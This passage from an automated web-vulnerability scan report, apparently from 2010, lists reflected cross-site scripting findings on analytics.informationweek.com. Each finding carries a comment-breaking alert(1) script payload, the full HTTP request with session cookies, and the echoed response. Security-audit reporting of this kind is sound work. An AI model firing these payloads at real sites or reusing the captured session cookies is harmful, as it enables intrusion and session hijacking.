<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... tionweek.com%2Fjs%2Fjquery.prettyPhoto.jsa7297--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f839360ee4&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/js/jquery.prettyPhoto.jsa7297--><script>alert(1)</script>0f839360ee4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 31bd7--><script>alert(1)</script>ccf4cc96713 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:22 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:22 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cript%3Ealert%281%29%3C%2Fscript%3Eccf4cc96713%2F1%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu31bd7--><script>alert(1)</script>ccf4cc96713/1/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload c5371--><script>alert(1)</script>435eecb50aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:35 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3E435eecb50aa%2FApplication-optimization%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1c5371--><script>alert(1)</script>435eecb50aa/Application-optimization/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e86ed--><script>alert(1)</script>a235d674e47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Cscript%3Ealert%281%29%3C%2Fscript%3Ea235d674e47%2FApplication-performance-optimization.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimizatione86ed--><script>alert(1)</script>a235d674e47/Application-performance-optimization.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 772ba--><script>alert(1)</script>2d612bfec11 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:42:07 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d612bfec11&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html772ba--><script>alert(1)</script>2d612bfec11"> ...[SNIP]...
3.45. http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload af5ae--><script>alert(1)</script>57fed5e992d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3E57fed5e992d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1/Application-optimization/Application-performance-optimization.html?af5ae--><script>alert(1)</script>57fed5e992d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 13258--><script>alert(1)</script>d54dc696a59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:58 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... --%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54dc696a59%2F10%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu13258--><script>alert(1)</script>d54dc696a59/10/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9c016--><script>alert(1)</script>7e4d87e08f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 016--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e4d87e08f%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload e9aa2--><script>alert(1)</script>6407169f2c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 9aa2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6407169f2c9%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload f552e--><script>alert(1)</script>256d5dde1af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... lf552e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E256d5dde1af&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af"> ...[SNIP]...
3.50. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aa634--><script>alert(1)</script>9cd1610281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cd1610281f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ea5fc--><script>alert(1)</script>808f19a7df2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... formationweek.com%2Fmenuea5fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E808f19a7df2%2F104%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c544--><script>alert(1)</script>890b31067f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ationweek.com%2Fmenu%2F1042c544--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E890b31067f8%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 505ac--><script>alert(1)</script>edbecabc005 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... om%2Fmenu%2F104%2FGovernment505ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eedbecabc005%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 132d0--><script>alert(1)</script>52b1d0b102f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2FGovernment%2FGovernment.html132d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52b1d0b102f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f"> ...[SNIP]...
3.55. http://analytics.informationweek.com/menu/104/Government/Government.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
